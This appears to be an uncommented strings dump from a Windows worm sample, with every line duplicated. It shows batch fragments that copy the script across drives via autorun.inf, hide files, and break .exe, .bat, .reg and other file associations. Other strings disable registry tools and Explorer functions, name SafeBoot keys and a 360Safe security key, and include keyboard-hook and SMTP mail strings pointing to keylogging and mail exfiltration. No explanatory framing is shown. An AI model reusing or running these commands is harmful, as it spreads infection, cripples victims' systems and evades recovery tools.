copy %0 d:\Program" "Files\run.bat

for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min

for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min

>>%%c:\system.bat

>>%%c:\system.bat

for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat

for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat

for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul

for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul

for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul

for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul

if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat

if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat

attrib d:\Program" "Files\run.bat r s h >nul

attrib d:\Program" "Files\run.bat r s h >nul

hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat

hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled

SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind

SOFTWARE\360Safe\safemon\ExecAccess

SOFTWARE\360Safe\safemon\ExecAccess

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop

Software\Policies\Microsoft\Windows\System\DisableCMD

Software\Policies\Microsoft\Windows\System\DisableCMD

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803

Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools

Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders

assoc .exe=nullfile

assoc .exe=nullfile

assoc .reg=nullfile

assoc .reg=nullfile

assoc .bat=nullfile

assoc .bat=nullfile

assoc .cmd=nullfile

assoc .cmd=nullfile

assoc .vbs=nullfile

assoc .vbs=nullfile

assoc .txt=nullfile

assoc .txt=nullfile

assoc .com=nullfile

assoc .com=nullfile

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f

reg delete "HKEY_CLASSES_ROOT\bluestacks" /f

reg delete "HKEY_CLASSES_ROOT\bluestacks" /f

reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f

reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f

@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat

@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat

goto 22c:\slears.bat

goto 22c:\slears.bat

.slear

.slear

d:\sleartest.exe

d:\sleartest.exe

adm-music.com

adm-music.com

O%u,%

O%u,%

JÃ·%

JÃ·%

ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP

ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP

fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP

fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP

c:\windows\system32\

c:\windows\system32\

F%*.*f

F%*.*f

CNotSupportedException

CNotSupportedException

commctrl_DragListMsg

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

Afx:%x:%x

COMCTL32.DLL

COMCTL32.DLL

CCmdTarget

CCmdTarget

__MSVCRT_HEAP_SELECT

__MSVCRT_HEAP_SELECT

user32.dll

user32.dll

iphlpapi.dll

iphlpapi.dll

SHLWAPI.dll

SHLWAPI.dll

MPR.dll

MPR.dll

VERSION.dll

VERSION.dll

WSOCK32.dll

WSOCK32.dll

.PAVCException@@

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.prn)|*.prn|

(*.*)|*.*||

(*.*)|*.*||

Shell32.dll

Shell32.dll

Mpr.dll

Mpr.dll

Advapi32.dll

Advapi32.dll

User32.dll

User32.dll

Gdi32.dll

Gdi32.dll

Kernel32.dll

Kernel32.dll

(&07-034/)7 '

(&07-034/)7 '

?? / %d]

?? / %d]

%d / %d]

%d / %d]

: %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

(*.CUR)|*.CUR|

%s:%d

%s:%d

windows

windows

out.prn

out.prn

%d.%d

%d.%d

%d / %d

%d / %d

%d/%d

%d/%d

Bogus message code %d

Bogus message code %d

(%d-%d):

(%d-%d):

%ld%c

%ld%c

VVV.dywt.com.cn

VVV.dywt.com.cn

%s

%s

Reply-To: %s

Reply-To: %s

From: %s

From: %s

To: %s

To: %s

Subject: %s

Subject: %s

Date: %s

Date: %s

Cc: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

%a, %d %b %Y %H:%M:%S

SMTP

SMTP

.PAVCObject@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCResourceException@@

.PAVCUserException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

.PAVCArchiveException@@

zcÃ

zcÃ

c:\%original file name%.exe

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

GetCPInfo

WinExec

WinExec

GetProcessHeap

GetProcessHeap

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyA

RegCreateKeyA

RegDeleteKeyA

RegDeleteKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

GetViewportExtEx

GetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

GetViewportOrgEx

ShellExecuteA

ShellExecuteA

GetKeyState

GetKeyState

SetWindowsHookExA

SetWindowsHookExA

GetKeyboardLayout

GetKeyboardLayout

VkKeyScanExA

VkKeyScanExA

keybd_event

keybd_event

CreateDialogIndirectParamA

CreateDialogIndirectParamA

UnhookWindowsHookEx

UnhookWindowsHookEx

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

(*.*)

(*.*)